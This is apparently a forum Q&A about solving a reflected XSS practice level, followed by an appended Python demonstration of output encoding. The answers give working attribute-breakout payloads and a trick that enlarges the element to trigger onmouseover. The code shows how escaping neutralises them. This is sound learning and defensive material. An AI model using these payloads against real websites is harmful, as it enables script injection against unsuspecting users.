
Bug bounty XSS vulnerability website payload

I recently started to teach myself about XSS vulnerabilities and stumbled upon this website for practice.

https://sudo.co.il/xss/level2.php

But after several attempts to enter several payloads

Example: <script>alert('XSS')</script>

I can't get XSS to work.

The value is reflected in the input value attribute. You can escape this by starting with a " and then add other attributes. For example: " onmouseover="alert('XSS')"

To require less user interaction you can change the style: " onmouseover="alert('XSS')" style="width: 1000px; height: 1000px" or there may be better attributes to use instead.

You can escape this by starting with a "

For example: "><img/src=x onerror=alert(origin)>
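
Why the payloads in both answers above break out of the value attribute, and how attribute-context output encoding stops them, shown as an added example that is not part of the original posts. The input template and all function names are assumptions; the page does not show the actual source of level2.php.

```python
from html import escape
from html.parser import HTMLParser

# The two payloads quoted in the answers above.
PAYLOADS = [
    "\" onmouseover=\"alert('XSS')",
    "\"><img/src=x onerror=alert(origin)>",
]
TEMPLATE = '<input type="text" name="q" value="%s">'  # assumed page markup

def render_unsafe(value):
    # Raw reflection: a double quote in the input closes value="...".
    return TEMPLATE % value

def render_safe(value):
    # Attribute-context encoding; quote=True also encodes " and '.
    return TEMPLATE % escape(value, quote=True)

class TagCollector(HTMLParser):
    """Records each start tag and its attributes as an HTML parser sees them."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

def parse(markup):
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags

def injected(markup):
    """True if the markup is anything other than one <input type name value>."""
    tags = parse(markup)
    if len(tags) != 1:
        return True
    tag, attrs = tags[0]
    return tag != "input" or set(attrs) != {"type", "name", "value"}

if __name__ == "__main__":
    for payload in PAYLOADS:
        for render in (render_unsafe, render_safe):
            markup = render(payload)
            print(render.__name__, injected(markup), markup)
```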
